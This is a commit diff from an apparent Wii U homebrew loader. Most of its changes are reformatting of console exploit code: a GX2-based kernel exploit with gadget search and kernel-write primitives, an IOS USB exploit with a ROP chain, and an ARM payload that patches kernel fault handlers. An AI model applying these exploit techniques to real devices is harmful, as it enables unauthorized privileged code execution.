Removed unused code, optimize logging, formatting, fix compiler warnings

This commit is contained in:
Maschell 2020-08-21 23:03:53 +02:00
parent 4cc24eda59
commit 3091afdd81
15 changed files with 125 additions and 651 deletions

View File

@ -2,22 +2,21 @@
#include <string.h> #include <string.h>
#include <coreinit/debug.h> #include <coreinit/debug.h>
#include <coreinit/thread.h>
#include <coreinit/cache.h> #include <coreinit/cache.h>
#include <coreinit/memdefaultheap.h> #include <coreinit/memdefaultheap.h>
#include <whb/sdcard.h> #include <whb/sdcard.h>
#include <whb/file.h> #include <whb/file.h>
#include <whb/log.h> #include <whb/log.h>
#include <utils/logger.h>
#include "elf_abi.h" #include "elf_abi.h"
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) {
char path[256]; char path[256];
int result = 0; int result = 0;
char *sdRootPath = ""; char *sdRootPath = "";
if (!WHBMountSdCard()) { if (!WHBMountSdCard()) {
WHBLogPrintf("Failed to mount SD Card..."); DEBUG_FUNCTION_LINE("Failed to mount SD Card...");
result = -1; result = -1;
goto exit; goto exit;
} }
@ -25,12 +24,12 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si
sdRootPath = WHBGetSdCardMountPath(); sdRootPath = WHBGetSdCardMountPath();
sprintf(path, "%s/%s", sdRootPath, relativefilepath); sprintf(path, "%s/%s", sdRootPath, relativefilepath);
WHBLogPrintf("Loading file %s.", path); DEBUG_FUNCTION_LINE("Loading file %s.", path);
*fileOut = WHBReadWholeFile(path, sizeOut); *fileOut = WHBReadWholeFile(path, sizeOut);
if (!(*fileOut)) { if (!(*fileOut)) {
result = -2; result = -2;
WHBLogPrintf("WHBReadWholeFile(%s) returned NULL", path); DEBUG_FUNCTION_LINE("WHBReadWholeFile(%s) returned NULL", path);
goto exit; goto exit;
} }
@ -74,16 +73,19 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned
for (i = 0; i < ehdr->e_shnum; i++) { for (i = 0; i < ehdr->e_shnum; i++) {
const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
if (strcmp(section_name, name) == 0) { if (strcmp(section_name, name) == 0) {
if (addr) if (addr) {
*addr = shdr[i].sh_addr; *addr = shdr[i].sh_addr;
if (size) }
if (size) {
*size = shdr[i].sh_size; *size = shdr[i].sh_size;
}
return shdr[i].sh_offset; return shdr[i].sh_offset;
} }
} }
if (fail_on_not_found) if (fail_on_not_found) {
OSFatal((char *) name); OSFatal((char *) name);
}
return 0; return 0;
} }

View File

@ -1,5 +1,4 @@
#ifndef ELF_LOADING_H #pragma once
#define ELF_LOADING_H
#include <stdint.h> #include <stdint.h>
@ -13,6 +12,3 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif
#endif /* ELF_LOADING_H */

View File

@ -14,46 +14,20 @@
#include <string.h> #include <string.h>
#include "ElfUtils.h" #include "ElfUtils.h"
#include "gx2sploit.h" #include "gx2sploit.h"
#include "utils/utils.h"
#define JIT_ADDRESS 0x01800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define JIT_ADDRESS 0x01800000 #define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_HEAP 0xFF200000 #define STARTID_OFFSET 0x08
#define KERN_HEAP_PHYS 0x1B800000 #define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_ADDRESS_TBL 0xFFEAB7A0
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define BAT_SETUP_HOOK_ADDR 0xFFF1D624
#define BAT_SETUP_HOOK_ENTRY 0x00880000
#define BAT4U_VAL 0x008000FF
#define BAT4L_VAL 0x30800012
#define BAT_SET_NOP_ADDR_1 0xFFF06B6C
#define BAT_SET_NOP_ADDR_2 0xFFF06BF8
#define BAT_SET_NOP_ADDR_3 0xFFF003C8
#define BAT_SET_NOP_ADDR_4 0xFFF003CC
#define BAT_SET_NOP_ADDR_5 0xFFF1D70C
#define BAT_SET_NOP_ADDR_6 0xFFF1D728
#define BAT_SET_NOP_ADDR_7 0xFFF1D82C
#define BAT_SET_NOP_ADDR_8 0xFFEE11C4
#define BAT_SET_NOP_ADDR_9 0xFFEE11C8
#define ADDRESS_main_entry_hook 0x0101c56c
#define ADDRESS_OSTitle_main_entry_ptr 0x1005E040
#define NOP_ADDR(addr) \
*(uint32_t*)addr = 0x60000000; \
asm volatile("dcbf 0, %0; icbi 0, %0" : : "r" (addr & ~31));
extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len);
@ -63,8 +37,9 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
/* Search code before JIT area first */ /* Search code before JIT area first */
for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) {
if (!memcmp(ptr, &code[0], length)) if (!memcmp(ptr, &code[0], length)) {
return ptr; return ptr;
}
} }
OSFatal("Failed to find gadget!"); OSFatal("Failed to find gadget!");
@ -131,7 +106,7 @@ int exploitThread(int argc, char **argv) {
uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data[] = {0xfc2a0000};
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14);
/* Modify a next ptr on the heap */ /* Modify a next ptr on the heap */
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
@ -185,8 +160,8 @@ extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len);
void KernelWrite(uint32_t addr, const void *data, uint32_t length) { void KernelWrite(uint32_t addr, const void *data, uint32_t length) {
// This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?)
// further testing required. // further testing required.
for (int32_t i = 0; i < length; i += 4) { for (uint32_t i = 0; i < length; i += 4) {
KernelWriteU32(addr + i, *(uint32_t *) (data + i)); KernelWriteU32(addr + i, *(uint32_t *) (((uint32_t) data) + i));
} }
} }
@ -203,17 +178,6 @@ void KernelWriteU32(uint32_t addr, uint32_t value) {
ICInvalidateRange((void *) addr, 4); ICInvalidateRange((void *) addr, 4);
} }
void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) {
ICInvalidateRange(&value, 4);
DCFlushRange(&value, 4);
uint32_t dst = (uint32_t) addr;
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
SC_KernelCopyData(dst, src, 4);
}
static void SCSetupIBAT4DBAT5() { static void SCSetupIBAT4DBAT5() {
asm volatile("sync; eieio; isync"); asm volatile("sync; eieio; isync");
@ -236,7 +200,6 @@ static void SCSetupIBAT4DBAT5() {
extern "C" void SC_0x36_SETBATS(void); extern "C" void SC_0x36_SETBATS(void);
int DoKernelExploit(void) { int DoKernelExploit(void) {
WHBLogPrintf("Running GX2Sploit"); WHBLogPrintf("Running GX2Sploit");
/* Make a thread to modify the semaphore */ /* Make a thread to modify the semaphore */

View File

@ -1,6 +1,5 @@
#pragma once #pragma once
#ifdef __cplusplus #ifdef __cplusplus
extern "C" { extern "C" {
#endif #endif
@ -13,7 +12,6 @@ extern "C" {
int DoKernelExploit(void); int DoKernelExploit(void);
void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value);
void KernelWrite(uint32_t addr, const void *data, uint32_t length); void KernelWrite(uint32_t addr, const void *data, uint32_t length);
void kern_write(const void *addr, uint32_t value); void kern_write(const void *addr, uint32_t value);
@ -21,9 +19,6 @@ extern int32_t Register(char *driver_name, uint32_t name_length, void *buf1, voi
extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length); extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length);
extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr); extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr);
extern void SC0x25_SetupSyscall(void);
extern unsigned int SC0x65_ExploitCheck(unsigned int in);
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif

View File

@ -5,19 +5,12 @@
#include <coreinit/ios.h> #include <coreinit/ios.h>
#include "ios_exploit.h" #include "ios_exploit.h"
#define ALIGN4(x) (((x) + 3) & ~3)
#define CHAIN_START 0x1016AD40 #define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE (0x120000) #define SOURCE (0x120000)
#define IOS_CREATETHREAD 0x1012EABC #define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000 #define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC #define REPLACE_SYSCALL 0x081298BC
extern const uint8_t launch_image_tga[];
extern const uint32_t launch_image_tga_size;
static void uhs_exploit_init(int uhs_handle); static void uhs_exploit_init(int uhs_handle);
static int uhs_write32(int uhs_handle, int arm_addr, int val); static int uhs_write32(int uhs_handle, int arm_addr, int val);
@ -237,7 +230,7 @@ static const int final_chain[] = {
0x0, // 0x1F0 0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC} 0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8 0x0, // 0x1F8
sizeof(ios_kernel), // 0x1FC our code size sizeof(ios_kernel),// 0x1FC our code size
0x0, // 0x200 0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location 0x00140000, // 0x208 our code source location
@ -326,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
} }
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
OSSleepTicks(0x200000); //! Improves stability OSSleepTicks(0x200000); //! Improves stability
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
int output_buffer[32]; int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
} }
@ -337,13 +330,7 @@ static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
int ExecuteIOSExploit() { int ExecuteIOSExploit() {
int iosuhaxFd = IOS_Open("/dev/iosuhax", 0); int iosuhaxFd = IOS_Open("/dev/iosuhax", 0);
if (iosuhaxFd >= 0) { if (iosuhaxFd >= 0) {
int dummy = 0;
//IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
//! do not run patches again as that will most likely crash //! do not run patches again as that will most likely crash
//! because the wupserver and the iosuhax dev node are still running
//! just relaunch IOS with new configuration
IOS_Close(iosuhaxFd); IOS_Close(iosuhaxFd);
return 0; return 0;
} }

View File

@ -1,5 +1,4 @@
#ifndef _IOS_EXPLOIT_H_ #pragma once
#define _IOS_EXPLOIT_H_
#ifdef __cplusplus #ifdef __cplusplus
extern "C" { extern "C" {
@ -10,5 +9,3 @@ int ExecuteIOSExploit();
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif
#endif

View File

@ -29,14 +29,13 @@
#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) #define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000)
void instant_patches_setup(void) { void instant_patches_setup(void) {
// fix 10 minute timeout that crashes MCP after 10 minutes of booting // fix 10 minute timeout that crashes MCP after 10 minutes of booting
*(volatile u32*)(0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
// patch default title id to system menu // patch default title id to system menu
*(volatile u32*)mcp_data_phys(0x050B817C) = *(volatile u32*)0x0017FFF0; *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0;
*(volatile u32*)mcp_data_phys(0x050B8180) = *(volatile u32*)0x0017FFF4; *(volatile u32 *) mcp_data_phys(0x050B8180) = *(volatile u32 *) 0x0017FFF4;
// force check USB storage on load // force check USB storage on load
*(volatile u32*)acp_phys(0xE012202C) = 0x00000001; // find USB flag *(volatile u32 *) acp_phys(0xE012202C) = 0x00000001; // find USB flag
} }

View File

@ -27,78 +27,76 @@
#define USB_PHYS_CODE_BASE 0x101312D0 #define USB_PHYS_CODE_BASE 0x101312D0
typedef struct typedef struct {
{
u32 size; u32 size;
u8 data[0]; u8 data[0];
} payload_info_t; } payload_info_t;
static const char repairData_set_fault_behavior[] = { static const char repairData_set_fault_behavior[] = {
0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00,
0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02,
0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, 0xE1, 0x53, 0x00, 0x00, 0xE3, 0xE0, 0x00, 0x00, 0x18, 0xBD, 0x80, 0x30, 0xE3, 0x54, 0x00, 0x0D,
}; };
static const char repairData_set_panic_behavior[] = { static const char repairData_set_panic_behavior[] = {
0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, 0x08, 0x16, 0x6C, 0x00, 0x00, 0x00, 0x18, 0x0C, 0x08, 0x14, 0x40, 0x00, 0x00, 0x00, 0x9D, 0x70,
0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, 0x08, 0x16, 0x84, 0x0C, 0x00, 0x00, 0xB4, 0x0C, 0x00, 0x00, 0x01, 0x01, 0x08, 0x14, 0x40, 0x00,
0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, 0x08, 0x15, 0x00, 0x00, 0x08, 0x17, 0x21, 0x80, 0x08, 0x17, 0x38, 0x00, 0x08, 0x14, 0x30, 0xD4,
0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, 0x08, 0x14, 0x12, 0x50, 0x08, 0x14, 0x12, 0x94, 0xE3, 0xA0, 0x35, 0x36, 0xE5, 0x93, 0x21, 0x94,
0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, 0xE3, 0xC2, 0x2E, 0x21, 0xE5, 0x83, 0x21, 0x94, 0xE5, 0x93, 0x11, 0x94, 0xE1, 0x2F, 0xFF, 0x1E,
0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, 0xE5, 0x9F, 0x30, 0x1C, 0xE5, 0x9F, 0xC0, 0x1C, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x10, 0x00,
0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, 0xE5, 0x92, 0x30, 0x54, 0xE5, 0x9C, 0x00, 0x00,
}; };
static const char repairData_usb_root_thread[] = { static const char repairData_usb_root_thread[] = {
0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, 0xE5, 0x8D, 0xE0, 0x04, 0xE5, 0x8D, 0xC0, 0x08, 0xE5, 0x8D, 0x40, 0x0C, 0xE5, 0x8D, 0x60, 0x10,
0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, 0xEB, 0x00, 0xB2, 0xFD, 0xEA, 0xFF, 0xFF, 0xC9, 0x10, 0x14, 0x03, 0xF8, 0x10, 0x62, 0x4D, 0xD3,
0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, 0x10, 0x14, 0x50, 0x00, 0x10, 0x14, 0x50, 0x20, 0x10, 0x14, 0x00, 0x00, 0x10, 0x14, 0x00, 0x90,
0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, 0x10, 0x14, 0x00, 0x70, 0x10, 0x14, 0x00, 0x98, 0x10, 0x14, 0x00, 0x84, 0x10, 0x14, 0x03, 0xE8,
0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, 0x10, 0x14, 0x00, 0x3C, 0x00, 0x00, 0x01, 0x73, 0x00, 0x00, 0x01, 0x76, 0xE9, 0x2D, 0x4F, 0xF0,
0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03,
0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20,
}; };
int _main() int _main() {
{ void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
void(*invalidate_icache)() = (void(*)())0x0812DCF0; void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164;
void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160;
flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache
int level = disable_interrupts(); int level = disable_interrupts();
unsigned int control_register = disable_mmu(); unsigned int control_register = disable_mmu();
/* Save the request handle so we can reply later */ /* Save the request handle so we can reply later */
*(volatile u32*)0x0012F000 = *(volatile u32*)0x1016AD18; *(volatile u32 *) 0x0012F000 = *(volatile u32 *) 0x1016AD18;
/* Patch kernel_error_handler to BX LR immediately */ /* Patch kernel_error_handler to BX LR immediately */
*(volatile u32*)0x08129A24 = 0xE12FFF1E; *(volatile u32 *) 0x08129A24 = 0xE12FFF1E;
void * pset_fault_behavior = (void*)0x081298BC; void *pset_fault_behavior = (void *) 0x081298BC;
kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); kernel_memcpy(pset_fault_behavior, (void *) repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior));
void * pset_panic_behavior = (void*)0x081296E4; void *pset_panic_behavior = (void *) 0x081296E4;
kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); kernel_memcpy(pset_panic_behavior, (void *) repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior));
void * pusb_root_thread = (void*)0x10100174; void *pusb_root_thread = (void *) 0x10100174;
kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); kernel_memcpy(pusb_root_thread, (void *) repairData_usb_root_thread, sizeof(repairData_usb_root_thread));
payload_info_t *payloads = (payload_info_t*)0x00148000; payload_info_t *payloads = (payload_info_t *) 0x00148000;
kernel_memcpy((void*)USB_PHYS_CODE_BASE, payloads->data, payloads->size); kernel_memcpy((void *) USB_PHYS_CODE_BASE, payloads->data, payloads->size);
// run all instant patches as necessary // run all instant patches as necessary
instant_patches_setup(); instant_patches_setup();
*(volatile u32*)(0x1555500) = 0; *(volatile u32 *) (0x1555500) = 0;
/* REENABLE MMU */ /* REENABLE MMU */
restore_mmu(control_register); restore_mmu(control_register);
invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache
invalidate_icache(); invalidate_icache();
enable_interrupts(level); enable_interrupts(level);
return 0; return 0;
} }

View File

@ -23,38 +23,33 @@
***************************************************************************/ ***************************************************************************/
// this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement // this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement
void reverse_memcpy(void* dst, const void* src, unsigned int size) void reverse_memcpy(void *dst, const void *src, unsigned int size) {
{
const unsigned char *src_p; const unsigned char *src_p;
unsigned char *dst_p; unsigned char *dst_p;
if((size >= 4) && !((dst - src) & 3)) if ((size >= 4) && !((dst - src) & 3)) {
{
const unsigned int *src_p32; const unsigned int *src_p32;
unsigned int *dst_p32; unsigned int *dst_p32;
unsigned int endDst = ((unsigned int)dst) + size; unsigned int endDst = ((unsigned int) dst) + size;
unsigned int endRest = endDst & 3; unsigned int endRest = endDst & 3;
if(endRest) if (endRest) {
{ src_p = ((const unsigned char *) (src + size)) - 1;
src_p = ((const unsigned char*)(src + size)) - 1; dst_p = ((unsigned char *) endDst) - 1;
dst_p = ((unsigned char*)endDst) - 1;
size -= endRest; size -= endRest;
while(endRest--) while (endRest--)
*dst_p-- = *src_p--; *dst_p-- = *src_p--;
} }
src_p32 = ((const unsigned int*)(src + size)) - 1; src_p32 = ((const unsigned int *) (src + size)) - 1;
dst_p32 = ((unsigned int*)(dst + size)) - 1; dst_p32 = ((unsigned int *) (dst + size)) - 1;
unsigned int size32 = size >> 5; unsigned int size32 = size >> 5;
if(size32) if (size32) {
{
size &= 0x1F; size &= 0x1F;
while(size32--) while (size32--) {
{
src_p32 -= 8; src_p32 -= 8;
dst_p32 -= 8; dst_p32 -= 8;
@ -70,23 +65,20 @@ void reverse_memcpy(void* dst, const void* src, unsigned int size)
} }
unsigned int size4 = size >> 2; unsigned int size4 = size >> 2;
if(size4) if (size4) {
{
size &= 3; size &= 3;
while(size4--) while (size4--)
*dst_p32-- = *src_p32--; *dst_p32-- = *src_p32--;
} }
dst_p = ((unsigned char*)dst_p32) + 3; dst_p = ((unsigned char *) dst_p32) + 3;
src_p = ((const unsigned char*)src_p32) + 3; src_p = ((const unsigned char *) src_p32) + 3;
} } else {
else dst_p = ((unsigned char *) dst) + size - 1;
{ src_p = ((const unsigned char *) src) + size - 1;
dst_p = ((unsigned char*)dst) + size - 1;
src_p = ((const unsigned char*)src) + size - 1;
} }
while(size--) while (size--)
*dst_p-- = *src_p--; *dst_p-- = *src_p--;
} }

View File

@ -1,24 +1,24 @@
void _main() void _main() {
{
void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; void (*ios_shutdown)(int) = (void (*)(int)) 0x1012EE4C;
int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04;
int saved_handle = *(volatile int*)0x0012F000; int saved_handle = *(volatile int *) 0x0012F000;
int myret = reply(saved_handle, 0); int myret = reply(saved_handle, 0);
if (myret != 0) if (myret != 0) {
ios_shutdown(1); ios_shutdown(1);
}
// stack pointer will be 0x1016AE30 // stack pointer will be 0x1016AE30
// link register will be 0x1012EACC // link register will be 0x1012EACC
asm("LDR SP, newsp\n" asm("LDR SP, newsp\n"
"LDR R0, newr0\n" "LDR R0, newr0\n"
"LDR LR, newlr\n" "LDR LR, newlr\n"
"LDR PC, newpc\n" "LDR PC, newpc\n"
"newsp: .word 0x1016AE30\n" "newsp: .word 0x1016AE30\n"
"newlr: .word 0x1012EACC\n" "newlr: .word 0x1012EACC\n"
"newr0: .word 0x10146080\n" "newr0: .word 0x10146080\n"
"newpc: .word 0x10111164\n"); "newpc: .word 0x10111164\n");
} }

View File

@ -1,41 +1,24 @@
#include <stdio.h> #include <stdio.h>
#include <string.h> #include <string.h>
#include <vector>
#include <coreinit/ios.h>
#include <coreinit/time.h> #include <coreinit/time.h>
#include <coreinit/systeminfo.h>
#include <coreinit/foreground.h> #include <coreinit/foreground.h>
#include <nsysnet/socket.h>
#include <proc_ui/procui.h> #include <proc_ui/procui.h>
#include <coreinit/thread.h> #include <coreinit/thread.h>
#include <whb/proc.h>
#include <whb/log.h> #include <whb/log.h>
#include <whb/log_udp.h> #include <whb/log_udp.h>
#include <sysapp/launch.h> #include <sysapp/launch.h>
#include <coreinit/exit.h> #include <sysapp/title.h>
#include <coreinit/cache.h> #include <coreinit/cache.h>
#include <coreinit/dynload.h>
#include <vpad/input.h> #include <vpad/input.h>
#include "utils/logger.h" #include "utils/logger.h"
#include "utils/utils.h"
#include "ElfUtils.h" #include "ElfUtils.h"
#include "ios_exploit.h" #include "ios_exploit.h"
#include "gx2sploit.h" #include "gx2sploit.h"
#ifdef __cplusplus
extern "C" {
#endif
#ifdef __cplusplus
}
#endif
bool CheckRunning() { bool CheckRunning() {
switch (ProcUIProcessMessages(true)) { switch (ProcUIProcessMessages(true)) {
@ -56,8 +39,6 @@ bool CheckRunning() {
return true; return true;
} }
extern "C" uint64_t _SYSGetSystemApplicationTitleId(int);
int main(int argc, char **argv) { int main(int argc, char **argv) {
WHBLogUdpInit(); WHBLogUdpInit();
@ -105,13 +86,13 @@ int main(int argc, char **argv) {
DEBUG_FUNCTION_LINE("ProcUIInit done"); DEBUG_FUNCTION_LINE("ProcUIInit done");
if (loadWithoutHacks) { if (loadWithoutHacks) {
DEBUG_FUNCTION_LINE("Load system menu"); DEBUG_FUNCTION_LINE("Load Wii U Menu");
// Restore the default title id to the normal wii u menu. // Restore the default title id to the normal Wii U Menu.
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0); unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU);
memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
DCStoreRange((void *) 0xF417FFF0, 0x8); DCStoreRange((void *) 0xF417FFF0, 0x8);
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll); DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll);
ExecuteIOSExploit(); ExecuteIOSExploit();
SYSLaunchMenu(); SYSLaunchMenu();
@ -123,7 +104,7 @@ int main(int argc, char **argv) {
} }
ProcUIShutdown(); ProcUIShutdown();
DEBUG_FUNCTION_LINE("Bye!"); DEBUG_FUNCTION_LINE("Exiting.");
WHBLogUdpDeinit(); WHBLogUdpDeinit();
return 0; return 0;

View File

@ -1,290 +0,0 @@
/***************************************************************************
* Copyright (C) 2010
* by Dimok
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any
* damages arising from the use of this software.
*
* Permission is granted to anyone to use this software for any
* purpose, including commercial applications, and to alter it and
* redistribute it freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you
* must not claim that you wrote the original software. If you use
* this software in a product, an acknowledgment in the product
* documentation would be appreciated but is not required.
*
* 2. Altered source versions must be plainly marked as such, and
